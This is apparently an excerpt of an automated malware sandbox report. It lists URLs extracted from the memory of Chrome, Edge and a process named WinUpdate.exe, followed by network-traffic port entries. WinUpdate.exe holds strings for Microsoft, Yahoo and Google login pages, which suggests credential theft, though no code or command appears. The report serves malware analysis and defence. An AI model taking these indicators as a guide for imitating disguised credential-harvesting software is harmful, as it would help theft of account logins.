                    Source: chrome.exe, 0000000E.00000003.2224778996.000010A801624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/vi
                    Source: chrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/w
                    Source: chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/x$
                    Source: chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/y
                    Source: chrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/z
                    Source: chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312598507.00002C7802114000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312383476.00002C78020F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/~$
                    Source: chrome.exe, 0000000E.00000003.2223901000.000010A801560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308825209.00002C7801F30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224415439.000010A8015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224041070.000010A80157C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312495590.00002C7802108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2311767217.00002C78020F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224630846.000010A80160C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223944515.000010A801568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224820186.000010A801634000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312528521.00002C780210C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223756334.000010A80154C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224674805.000010A80161C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223510968.000010A8014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224001492.000010A80156C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312460742.00002C78020F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312563079.00002C7802110000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2222901225.000010A801454000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223557123.000010A801518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224363950.000010A8015D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2312663885.00002C7802118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2308864089.00002C7801F34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
                    Source: chrome.exe, 0000000E.00000003.2224415439.000010A8015D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224363950.000010A8015D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/
                    Source: chrome.exe, 0000000E.00000003.2222995489.000010A801470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Con
                    Source: chrome.exe, 0000000E.00000003.2224722853.000010A801620000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2224778996.000010A801624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
                    Source: chrome.exe, 0000000E.00000003.2223510968.000010A8014F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2223557123.000010A801518000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Pre
                    Source: chrome.exe, 0000000E.00000003.2224778996.000010A801624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
                    Source: chrome.exe, 0000000E.00000003.2315208381.00002C7802260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2225995536.000010A801720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2315173930.00002C780225C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2225959354.000010A80171C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2314984824.00002C7802258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/b
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/bJ
                    Source: chrome.exe, 0000000E.00000003.2225995536.000010A801720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2225959354.000010A80171C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/https://google-ohttp-relay-safebrowsing.fast
                    Source: msedge.exe, 00000017.00000002.2400833497.00002304002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://googleusercontent.comb
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs27
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://goto.google.com/sme-bugs2e
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/161903006
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/166809097
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/184850002
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/187425444
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/220069903
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/229267970
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/250706693
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/253522366
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/255411748
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/258207403
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/274859104
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/284462263
                    Source: chrome.exe, 0000000E.00000003.2253687564.00002C780036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://issuetracker.google.com/issues/166475273
                    Source: chrome.exe, 0000000E.00000003.2219180744.000010A800F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2
                    Source: chrome.exe, 0000000E.00000003.2219180744.000010A800F54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://labs.google.com/search/experiments
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/2
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lens.google.com/v3/upload2
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
                    Source: WinUpdate.exe, 0000000F.00000002.2217622719.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                    Source: WinUpdate.exe, 0000000F.00000002.2217622719.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: WinUpdate.exe, 0000000F.00000002.2217622719.0000000000F81000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: WinUpdate.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: msedge.exe, 00000017.00000002.2400833497.00002304002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.cn/
                    Source: msedge.exe, 00000017.00000002.2400833497.00002304002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://msn.com/
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myaccount.google.com/shielded-email2B
                    Source: chrome.exe, 0000000E.00000003.2203546123.000010A8012F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/
                    Source: chrome.exe, 0000000E.00000003.2203546123.000010A8012F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/OfflinePagesPrefetchingForcedOn_OfflinePagesPrefetchingOfflinePage
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nonexistent.googlezip.net/b
                    Source: msedge.exe, 00000017.00000002.2400833497.00002304002C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://office.net/
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                    Source: msedge.exe, 00000017.00000003.2336607244.0000230400274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2336694769.0000230400284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2#
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=blockedb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tunnel-staging.googlezip.net/2
                    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.25.drString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/
                    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.25.drString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/
                    Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.25.drString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/
                    Source: WinUpdate.exe, WinUpdate.exe, 00000011.00000002.2198792719.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: chrome.exe, 0000000E.00000003.2287637843.00002C7800E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/2(
                    Source: WinUpdate.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/b
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJ
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chromesuggestionsJK
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/coacbE
                    Source: Web Data.25.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                    Source: chrome.exe, 0000000E.00000003.2305149789.00002C7801C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2305075947.00002C7801C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestions
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chrome-content-suggestionsb
                    Source: chrome.exe, 0000000E.00000003.2315208381.00002C7802260000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2315173930.00002C780225C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2314984824.00002C7802258000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                    Source: chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2291899443.00002C780120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/de/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/gb/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/global/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/duplex/stable-experiment/change_password_scripts.jsonb3
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2220474345.000010A80111C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2305388014.00002C7801C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2220096453.000010A801108000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2220270365.000010A801118000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2305425851.00002C7801C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2220182901.000010A80110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2305312149.00002C7801C78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/android/translate_ranker_
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000003.2221446542.000010A800320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jegs.com/webapp/wcs/stores/servlet/OrderItemDisplay
                    Source: chrome.exe, 0000000E.00000003.2203823206.000010A800A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.privacysandbox.comb
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
